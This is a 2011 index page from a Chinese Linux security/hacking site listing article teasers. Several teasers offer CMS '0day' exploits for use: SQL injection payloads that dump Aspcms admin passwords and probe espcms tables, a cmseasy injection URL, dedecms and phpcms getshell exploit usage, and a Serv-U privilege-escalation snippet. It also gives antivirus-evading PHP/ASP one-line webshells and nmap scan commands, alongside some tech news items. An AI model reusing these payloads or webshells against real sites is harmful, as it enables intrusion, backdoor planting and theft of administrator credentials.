Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# linux下nmap的使用-linux网络扫描技术
  • 日期:2011-12-13 点击:303nmap on linux 官网 nmap.org centos下可以yum install namp 进行安装 4种常用的扫描 1.nmap -sP 1.1.1.1/24 探测C段存活主机,可以用 |grep up 过滤存活的主机 2. nmap -sS 1.1.1.1-30 -p 80 SYN扫描,指定IP范围指定端口。 3.nmap -sV 1.1.1.1 -p 1-65535
  • Linux安全# dedecms 5.5 0day 转载
  • 日期:2011-12-10 点击:206DEDECMS5.5的GETSHELL漏洞,危害不小,前几天得到。 EXP利用: CMD里执行: dedeexp www.51xiangxun.com / 成功后在目标网站产生DATA/CACHE/T.PHP文件,一句话木马连接,密码是t 测试需要PHP运行环境 ^_^ 201003082024476407.rar
  • Linux安全# PHP推荐禁用函数disable_functions PHP安全配置
  • 日期:2011-12-04 点击:197最近服务器的phpmyadmin一直不正常,原以为配置错误,结果发现是前段时间修改disable_function引起的, 逐步比较disable_function的参数发现,原来是因为opendir,readdir,dir,chdir这4个参数引起的 禁用opendir报错如下: phpmyadmin就会出现如下错误 phpMyAd
  • Linux安全# Aspcms 1.5 COOKIES注入0day
  • 日期:2011-12-04 点击:52Aspcms 1.5 COOKIES 注入 0day ,注册一个帐号。然后登陆后修改COOKIES的USERID值 在后面加上注入语句: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins 然后编辑帐号就能看到管理员的帐号和
  • Linux安全# (CentOS+Nginx+PHP+Mysql)配置和WEB服务器安全配置方案
  • 日期:2011-11-30 点击:190服务器的安全设置及其他 主要内容: [设置Ngnix可提供AVI、MP3等的下载] [设置网站并发数限制] [设置nginx程序限制的1M上传问题] [优化PHP] [优化mysql] [mysql的安全设置] [系统整体安全调整] [设置Ngnix可提供AVI、MP3等的下载] # vi /usr/local/webserver
  • Linux安全# espcms最新注入0day
  • 日期:2011-11-30 点击:114上EXP。一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。 爆表前缀: index.php?ac=searchat=taglisttagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schem
  • Linux安全# emseasy最新注入漏洞
  • 日期:2011-11-30 点击:118易通企业网站系统最新 注入 漏洞 。 注入EXP: http://www. tmdsb .com/celive/js/include.php?cmseasylive=1111departmentid=0 直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 百度关键字:Powered by Cm
  • Linux安全# 史上最全的各个脚本的一句话木马
  • 日期:2011-11-16 点击:65史上最全的各个脚本的一句话木马,防扫,防杀,防火,防盗~~~~~~ 以下这个ASP一句话 “” Then ExecuteGlobal(Request(“1))%> ?php ($_=@$_GET[2]).@$_($_POST[1])? 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错, 比如in
  • Linux安全# Linux 递归经典:fork 炸弹
  • 日期:2011-11-04 点击:103函数在程序设计中是一个非常重要的概念,它可以将程序划分成一个个功能相对独立的代码块,使代码的模块化更好,结构更加清晰,并可以有效地减少程序的代码量。递归函数更是充分提现了这些优点,通过在函数定义中调用自身,可以将复杂的计算问题变成一个简单
  • Linux安全# phpcms 2008最新0day加批量EXP代码 2011年11月
  • 日期:2011-11-02 点击:104玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php ?php print_r '+---------------------------------------------------------------------------+PHPCMS Remote Code Inject GetShell ExploitGoogle Dork:Powe
  • Linux安全# SiteServer 3.4.4最新SQL注入0day
  • 日期:2011-10-26 点击:54这几天在看一个站的时候发现了这个CMS,网上公布了一些 漏洞 ,没说明具体版本, 但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版, 看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是: SiteServer系列产品最
  • Linux安全# ECSHOP 2.7.2最新盲注漏洞
  • 日期:2011-10-23 点击:135ECShop存在一个盲注 漏洞 ,问题存在于/api/client/api.php文件中,提交特制的 恶意POST请求可进行SQL 注入 攻击,可获得敏感信息或操作数据库。 要成功利用漏洞需要服务器magic_quote_gpc设置为off。有点鸡肋! EXP:稍等~~~~~~~~~~~
  • Linux安全# C语言之父丹尼斯·里奇也登船了
  • 日期:2011-10-14 点击:177昨日,在众多的国际互动论坛上,计算机爱好者们以特有的方式纪念这位 编程语言的重要奠基人。许多网友的发帖中没有片言只字,仅仅留下一个 分号“;”。在C语言中,分号标志着一行指令语句的结束,网友们以此来悼 念“C语言之父”,美国著名计算机专家丹尼斯
  • Linux安全# 微软WP7手机系统摄像头非法跟踪用户坐标
  • 日期:2011-10-12 点击:137致力于Windows Phone手机破解的 黑客 Rafael Rivera发现,Windows Phone 7 手机在未经用户允许的情况下通过照相程序手机用户位置信息。 Rafael Rivera在观察Windows Phone系统收发数据包时发现,用户即使在选择不分享 地理位置的前提下使用照相程序后WP7手机
  • Linux安全# 黑客称德国绿坝时时监控网络用户
  • 日期:2011-10-12 点击:190美国全国广播公司10月9日报道,总部位于德国的 黑客 组织“混沌计算机俱乐部” (Chaos Computer Club,CCC)日前宣称,德国政府开发出一种特洛伊木马程序, 能够在网络用户不知情的情况下,对他们实施秘密监控。 “混沌计算机俱乐部”在其网站上称,他们已
  • Linux安全# serv-u最新通杀所有版本0day
  • 日期:2011-10-10 点击:116serv-u最新通杀所有版本 提权 代码。10.x的也可以提,昨天俺成功11版本的, 不要直接添加系统帐号或者执行命令,用添加的FTP帐号在CMD下面连接提权。 要不容易出错的。 EXP: style type = text/css ! --body,td,th font-size : 12px ; -- / style % Function
  • Linux安全# 入侵泰国女总理微博帐号的黑客被捕
  • 日期:2011-10-09 点击:138泰国信息和通讯技术部长阿努滴·那空他5日说,非法侵入总理英拉·西那瓦微博客的一名 “ 黑客 ”遭拘捕,可能面临两年监禁。 大学生阿加维·通迪沃拉昆现年22岁,受到执法人员调查后自首。他供认,自己本月2 日盗取英拉的微博客账号,发布8条微博,批评英拉
  • Linux安全# 行尸走肉第二季确定播出时间
  • 日期:2011-10-09 点击:192据国外媒体报道,热门美剧《行尸走肉》(The Walking Dead)在圣地亚哥动漫展 (Comic-Con)第二天召开了新闻发布会,公布该剧第二季将于当地时间10月16日周日晚九点首播。 无论对于剧迷还是漫画爱好者来说,《行尸走肉》的发布会都是绝对不能错过的盛事。 在该
  • Linux安全# mysql官方网站被黑并获得了ROOT权限
  • 日期:2011-09-29 点击:198我X。这也太 tmd 牛X了吧。不知道是哪个国家的。上次是PHP让中国大牛强奸。这次轮到它了。 Amorize的安全研究人员最近表示,已经确认 黑客 入侵mysql.com,并通过iframe的方法 让用户感染了恶意代码,他们已经追踪到佛罗里达和瑞典两个恶意软件托管地,在当
  • Linux安全# dedecms官方模板包含一句话木马
  • 日期:2011-09-28 点击:169现在的 黑客 多胆大包天啊,在天朝居然敢干这种明目张胆的事情。 应该是前几天出的那个dedecms的 0day .官方的网站被日,然后被在风格模板里面值入 了一句话木马。XXOO。这年头啥多靠不
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史